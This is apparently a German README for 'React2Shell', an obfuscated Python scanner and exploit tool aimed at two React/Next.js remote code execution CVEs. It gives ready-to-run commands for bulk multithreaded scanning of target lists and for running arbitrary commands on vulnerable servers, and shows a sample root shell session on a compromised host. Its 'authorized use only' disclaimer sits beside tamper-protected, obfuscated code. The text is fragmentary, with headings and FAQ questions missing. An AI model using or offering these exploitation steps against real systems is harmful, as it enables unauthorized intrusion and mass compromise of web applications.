
React2Shell - CVE-2025-55182 & CVE-2025-66478
Autor: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Version: 2.0.0 (Verschleiert)
Datum: 2025-12-07
python react2shell.py
Das war's! Der Scanner wird:
[1] Scan Single URL
[2] Scan Multiple URLs from File
[3] Exploit Single URL
[4] Exploit Multiple URLs from File
[5] Interactive Shell (Exploit Mode)
[6] Settings
[7] View Previous Results
[0] Exit
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Scan multiple URLs
python react2shell.py -f targets.txt
# Exploit with command
python react2shell.py -u https://target.com --exploit -c "whoami"
# Bulk scan with threads
python react2shell.py -f targets.txt -t 20 -o results.json
Jedes Mal, wenn Sie den Scanner ausführen, führt er automatisch Folgendes durch:
Wenn jemand versucht, den verschleierten Code zu modifizieren:
[ERROR] Scanner integrity check FAILED!
[!] The scanner code has been tampered with.
[!] This is a protected tool by LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Der Scanner wird sich weigern zu laufen, wenn er eine Manipulation feststellt.
Alle ursprünglichen Funktionen sind 100% erhalten:
python react2shell.py -u https://example.com
Ausgabe:
=================================================================
CVE Scanner - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================
[*] Scanning: https://example.com
[+] VULNERABLE: https://example.com
Version: 15.0.1
CVE-2025-55182: VULNERABLE
CVE-2025-66478: VULNERABLE
python react2shell.py
# Select option 5
# Enter target URL
Shell-Sitzung:
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
Dieses Tool ist NUR für AUTORISIERTE SICHERHEITSTESTS!
✅ Eigene Anwendungen
✅ Autorisierte Penetrationstests
✅ Bug-Bounty-Programme (im Rahmen)
✅ Sicherheitsforschung (autorisiert)
❌ Unautorisierte Scans
❌ Unautorisierte Ausnutzung
❌ Jegliche illegale Aktivität
❌ Verstoß gegen Nutzungsbedingungen
Der Autor (LAKSHMIKANTHAN K) ist nicht verantwortlich für den Missbrauch dieses Tools. Benutzer sind allein für ihre Handlungen verantwortlich und müssen alle geltenden Gesetze einhalten.
Ursache: Datei ist beschädigt
Lösung: Laden Sie eine neue Kopie herunter
Ursache: Datei wurde modifiziert
Lösung: Laden Sie eine neue Kopie herunter (modifizieren Sie die Datei nicht)
Ursache: Fehlende Abhängigkeiten
Lösung:
pip install requests urllib3
Ursache: Overhead durch Dekomprimierung (minimal)
Hinweis: Tritt nur einmal beim Start auf, dann läuft es mit voller Geschwindigkeit
A: Der Code ist verschleiert und komprimiert. Sie können die ursprüngliche, nicht verschleierte Version verwenden, wenn Sie den Code lesen müssen.
A: Minimale Auswirkung. Es gibt eine winzige Verzögerung beim Start für die Dekomprimierung (~0,1 Sekunden), dann läuft es mit voller Geschwindigkeit.
A: Nein. Jede Modifikation wird die Integritätsprüfung brechen und der Scanner wird sich weigern zu laufen.
A: Verschleierung ist keine Verschlüsselung. Entschlossene Angreifer können es immer noch zurückentwickeln, aber es ist sehr schwierig und zeitaufwändig.
A: Kontaktieren Sie den Autor auf Instagram: @letchu_pkt
Name: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Wenn Sie auf Probleme stoßen:
pip install requests urllib3
python react2shell.py
Wählen Sie aus dem interaktiven Menü oder verwenden Sie den CLI-Modus.
Folgen Sie den Eingabeaufforderungen oder geben Sie Befehlszeilenargumente an.
# Interactive mode
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Bulk scan
python react2shell.py -f targets.txt -t 20
# Exploit
python react2shell.py -u https://target.com --exploit -c "whoami"
# Help
python react2shell.py --help
LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Vielen Dank, dass Sie den CVE-Scanner verwenden! 🚀
Version: 2.0.0 (Verschleiert)
Datum: 2025-12-07
Lizenz: Nur für autorisierte Sicherheitstests